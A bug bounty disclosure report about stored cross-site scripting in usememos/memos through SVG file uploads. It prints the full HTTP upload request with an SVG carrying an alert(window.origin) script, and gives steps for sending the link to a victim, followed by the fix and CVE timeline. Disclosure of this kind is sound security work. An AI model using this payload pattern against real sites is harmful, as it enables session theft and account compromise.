Cross-site scripting - Stored via upload `.svg` file in in usememos/memos

Valid

Reported on

Dec 20th 2022


Description

When user upload a file with .svg extension and direct access this file, the server response with Content-type: image/svg+xml lead to processing SVG as HTML file

Proof of Concept

POST /api/resource HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MTUzMjkzMXxEdi1EQkFFQ180UUFBUkFCRUFBQUhfLUVBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOG89fDYqserGzpcgkE9G0qSf_dQ9Q8rHAMeM_lb9V-vZecyd
Content-Length: 462
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFu7Yl3xXBKej60Xw
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.usememos.com
Referer: https://demo.usememos.com/?text=1&shortcutId=1
Accept-Encoding: gzip, deflate

------WebKitFormBoundaryFu7Yl3xXBKej60Xw
Content-Disposition: form-data; name="file"; filename="xss.svg"
Content-Type: image/svg+xml

<svg width="100%" height="100%" viewBox="0 0 100 100"
     xmlns="http://www.w3.org/2000/svg">
  <circle cx="50" cy="50" r="45" fill="green"
          id="foo"/>
  <script type="text/javascript">
    // <![CDATA[
      alert(window.origin);
   // ]]>
  </script>
</svg>
------WebKitFormBoundaryFu7Yl3xXBKej60Xw--

Step to reproduce

  1. Prepare a file xss.svg with content: <script type="text/javascript">// <![CDATA[alert(window.origin);// ]]></script>
  2. Upload xss.svg file in Resource library -> Upload
  3. Coppy Link file XSS send to victim

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

We are processing your report and will contact the usememos/memos team within 24 hours. 20 days ago
Juy Lang modified the report
20 days ago
Juy Lang modified the report
20 days ago
We have contacted a member of the usememos/memos team and are waiting to hear back 19 days ago
STEVEN validated this vulnerability 17 days ago
Juy Lang has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.0 with commit c07b4a 17 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 17 days ago
Juy Lang
16 days ago

Researcher


I see the CVE has not been assigned. Please help me!!

to join this conversation